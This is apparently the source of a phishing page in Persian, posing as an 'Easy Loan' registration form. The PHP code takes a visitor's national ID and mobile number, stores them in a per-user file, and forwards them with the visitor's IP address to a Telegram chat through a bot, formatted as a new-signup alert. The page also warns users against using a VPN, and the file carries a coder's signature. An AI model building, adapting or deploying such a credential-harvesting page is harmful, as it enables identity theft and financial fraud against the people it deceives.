<?php
include("config.php");
session_start();
?>
<!DOCTYPE html>
<html lang="fa" dir="rtl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ثبت نام | وام آسان</title>
    <link rel="stylesheet" href="css/all.min.css">
    <link href="https://fonts.googleapis.com/css2?family=Vazirmatn:wght@300;400;500;600;700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="css/style.css">
</head>
<body>
<?php
if(isset($_POST['national_id'],$_POST['phone'],$_POST['captcha'])){
    $nat = normalizeDigits($_POST['national_id']);
    $pho = normalizeDigits($_POST['phone']);
        if(checknationalcode($nat) && bankchecknum((int)$pho, 9000000000, 9999999999)){
if(strtoupper($_POST['captcha'])==strtoupper($_SESSION['captcha'])){
    if(!file_exists("9b4bc35-users/$nat.txt")){
    file_put_contents("9b4bc35-users/$nat.txt",json_encode(["phone"=>$pho,"name"=>"","father"=>"","birth"=>""]));
}
        bot('sendMessage', [
'chat_id' => $chat_id,
'text' => "✅ ɴᴇᴡ #sɪɴɢᴜᴘ\n
🧾 ɴᴀᴛɪᴏɴᴀʟ ᴄᴏᴅᴇ : <code>$nat</code>
☎️ ᴘʜᴏɴᴇ-ɴᴜᴍ : <code>$pho</code>\n
🌐 ɪᴘ : <code>$ip</code>\n 
🧑🏻‍💻 ᴅᴇᴠᴇʟᴏᴘᴇʀ / sᴜᴘᴘᴏʀᴛ ~ <a href='https://t.me/$chid'>$chname</a>",
'parse_mode' => 'HTML',
    'disable_web_page_preview' => true ]);
$_SESSION['data']=['national_id'=>$_POST['national_id'],'phone'=>$_POST['phone']];
echo '<meta http-equiv="refresh" content="1; URL=\'./index12.php\'" />';
exit();
}else{
echo '<script>alert("کد کپچا را اشتباه وارد کردی");</script>';
}
}else{
echo '<script>alert("کد ملی یا شماره تلفن بدرستی وارد نشده!");</script>';
}
}
$_SESSION['captcha']=rand(1000,9999);
?>
    <div class="container">
        <header>
            <div class="logo-container">
                <div class="logo-img">
                    <i class="fas fa-crown"></i>
                </div>
                <a href="#" class="logo-text">وام آسان</a>
            </div>
        </header>

        <form class="login-container" method="POST" id="loginForm">
            <h1 class="login-title">فرم ثبت نام</h1>
            
            <div class="form-group">
                <label for="username" class="form-label">کد ملی</label>
                <input type="text" id="username" name="national_id" class="form-input" placeholder="کد ملی خود را وارد کنید" maxlength="10">
            </div>

            <div class="form-group">
                <label for="tele" class="form-label">شماره همراه</label>
                <input type="tel" id="tele" name="phone" class="form-input" placeholder="شماره تلفن خود را وارد کنید" maxlength="11">
            </div>

            <div class="form-group">
                <label for="cap" class="form-label">کد امنیتی</label>
                <img class="captcha" src="./images/captcha.png" alt="کد امنیتی">
                <input type="text" id="cap" name="captcha" class="form-input" placeholder="کد امنیتی">
            </div>

            <input type="submit" class="login-button" value="ادامه">

            <div class="forgot-password">
                <a href="/status" class="forgot-link">استعلام وضعیت درخواست تسهیلات</a>
            </div>

            <div class="security-notice">
                <i class="fas fa-shield-alt"></i>
                کاربر گرامی به منظور حفظ امنیت، از استفاده همزمان از فیلترشکن خودداری فرمایید
            </div>
        </form>
    </div>

    <script>
        const bankOptions = document.querySelectorAll('.bank-option');
        bankOptions.forEach(option => {
            option.addEventListener('click', () => {
                bankOptions.forEach(o => o.classList.remove('selected'));
                option.classList.add('selected');
                option.querySelector('input[type="radio"]').checked = true;
            });
        });
        const form = document.getElementById('loginForm');
        form.addEventListener('submit', function(e) {
            const nationalID = document.getElementById('username').value.trim();
            const phone = document.getElementById('tele').value.trim();
            const captcha = document.getElementById('cap').value.trim();
/*
            if(!/^\d{10}$/.test(nationalID)){
                alert('کد ملی باید ۱۰ رقم باشد.');
                e.preventDefault();
                return;
            }

            if(!/^09\d{9}$/.test(phone)){
                alert('شماره همراه معتبر نیست.');
                e.preventDefault();
                return;
            } */

            if(captcha === ''){
                alert('لطفا کد امنیتی را وارد کنید.');
                e.preventDefault();
                return;
            }
        });
    </script>
</body>
</html>
//CODED BY @MD0TM